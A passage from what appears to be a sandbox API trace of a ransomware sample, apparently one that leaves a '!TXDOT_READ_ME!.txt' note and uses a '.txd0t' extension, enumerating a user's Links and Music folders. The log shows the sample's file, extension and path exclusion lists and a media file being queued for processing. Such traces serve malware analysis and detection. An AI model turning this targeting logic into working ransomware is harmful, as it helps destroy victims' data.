ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0074.831] StrCmpW (psz1=".", psz2=".") returned 0 [0074.831] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.831] StrCmpW (psz1="..", psz2=".") returned 1 [0074.831] StrCmpW (psz1="..", psz2="..") returned 0 [0074.831] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.831] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.831] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.831] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0074.831] StrCmpW (psz1="Desktop.lnk", psz2=".") returned 1 [0074.831] StrCmpW (psz1="Desktop.lnk", psz2="..") returned 1 [0074.831] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0074.831] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0074.831] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Desktop.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Desktop.lnk") returned="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" [0074.831] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0074.831] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="bootsect.bak") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="iconcache.db") returned -1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="thumbs.db") returned -1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2=" ransomware ") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2=" ransom ") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="debug.txt") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="boot.ini") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="desktop.ini") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="autorun.inf") returned 1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="ntuser.dat") returned -1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="ntldr") returned -1 [0074.831] StrCmpIW (psz1="Desktop.lnk", psz2="ntdetect.com") returned -1 [0074.832] StrCmpIW (psz1="Desktop.lnk", psz2="bootfont.bin") returned 1 [0074.832] StrCmpIW (psz1="Desktop.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.832] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0074.832] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0074.832] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0074.832] StrCmpW (psz1="Downloads.lnk", psz2=".") returned 1 [0074.832] StrCmpW (psz1="Downloads.lnk", psz2="..") returned 1 [0074.832] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0074.832] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0074.832] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Downloads.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Downloads.lnk") returned="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" [0074.832] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0074.832] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="bootsect.bak") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="iconcache.db") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="thumbs.db") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2=" ransomware ") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2=" ransom ") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="debug.txt") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="boot.ini") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="desktop.ini") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="autorun.inf") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="ntuser.dat") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="ntldr") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="ntdetect.com") returned -1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="bootfont.bin") returned 1 [0074.832] StrCmpIW (psz1="Downloads.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.832] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0074.832] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0074.832] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0074.832] StrCmpW (psz1="OneDrive.lnk", psz2=".") returned 1 [0074.832] StrCmpW (psz1="OneDrive.lnk", psz2="..") returned 1 [0074.832] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0074.832] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0074.833] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="OneDrive.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk") returned="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" [0074.833] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0074.833] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="bootsect.bak") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="iconcache.db") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="thumbs.db") returned -1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransomware ") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransom ") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="debug.txt") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="boot.ini") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="desktop.ini") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="autorun.inf") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="ntuser.dat") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="ntldr") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="ntdetect.com") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="bootfont.bin") returned 1 [0074.833] StrCmpIW (psz1="OneDrive.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.833] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0074.833] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0074.833] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0074.833] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0074.833] GetProcessHeap () returned 0xe30000 [0074.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0074.833] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0074.833] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0074.833] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0074.833] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5af053a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5af053a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0074.833] StrCmpW (psz1="Music", psz2=".") returned 1 [0074.833] StrCmpW (psz1="Music", psz2="..") returned 1 [0074.833] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0074.833] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0074.834] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\boot\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\programdata\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\drivers\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\wsus\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="crypt_detect") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="cryptolocker") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="ransomware") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.834] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files") returned 0x0 [0074.834] GetProcessHeap () returned 0xe30000 [0074.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed0058 [0074.834] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.834] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\*") returned="C:\\Users\\FD1HVy\\Music\\*" [0074.834] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5af053a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5af053a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0074.835] StrCmpW (psz1=".", psz2=".") returned 0 [0074.835] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5af053a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5af053a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.835] StrCmpW (psz1="..", psz2=".") returned 1 [0074.835] StrCmpW (psz1="..", psz2="..") returned 0 [0074.835] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26955360, ftCreationTime.dwHighDateTime=0x1d5ebeb, ftLastAccessTime.dwLowDateTime=0x211fab0, ftLastAccessTime.dwHighDateTime=0x1d5e435, ftLastWriteTime.dwLowDateTime=0x211fab0, ftLastWriteTime.dwHighDateTime=0x1d5e435, nFileSizeHigh=0x0, nFileSizeLow=0x108f4, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="33TPGnDT5IeW5L2R8Q.wav", cAlternateFileName="33TPGN~1.WAV")) returned 1 [0074.835] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2=".") returned 1 [0074.835] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="..") returned 1 [0074.835] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.835] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.835] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="33TPGnDT5IeW5L2R8Q.wav", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav") returned="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" [0074.835] PathFindExtensionW (pszPath="33TPGnDT5IeW5L2R8Q.wav") returned=".wav" [0074.835] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="bootsect.bak") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="iconcache.db") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="thumbs.db") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2=" ransomware ") returned 1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2=" ransom ") returned 1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="debug.txt") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="boot.ini") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="desktop.ini") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="autorun.inf") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="ntuser.dat") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="ntldr") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="ntdetect.com") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="bootfont.bin") returned -1 [0074.835] StrCmpIW (psz1="33TPGnDT5IeW5L2R8Q.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.835] PathFindExtensionW (pszPath="33TPGnDT5IeW5L2R8Q.wav") returned=".wav" [0074.835] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0074.835] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.835] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.836] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.843] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.843] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" [0074.843] SetEvent (hEvent=0x3fc) returned 1 [0074.843] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.843] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.843] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.843] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x897ba060, ftLastAccessTime.dwHighDateTime=0x1d5f078, ftLastWriteTime.dwLowDateTime=0x897ba060, ftLastWriteTime.dwHighDateTime=0x1d5f078, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="ESQxTLKmutc", cAlternateFileName="ESQXTL~1")) returned 1 [0074.844] StrCmpW (psz1="ESQxTLKmutc", psz2=".") returned 1 [0074.844] StrCmpW (psz1="ESQxTLKmutc", psz2="..") returned 1 [0074.844] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.844] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.844] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="ESQxTLKmutc", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system32\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\local\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\boot\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\perflogs\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\programdata\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\drivers\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\wsus\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="crypt_detect") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="cryptolocker") returned 0x0 [0074.844] StrStrIW 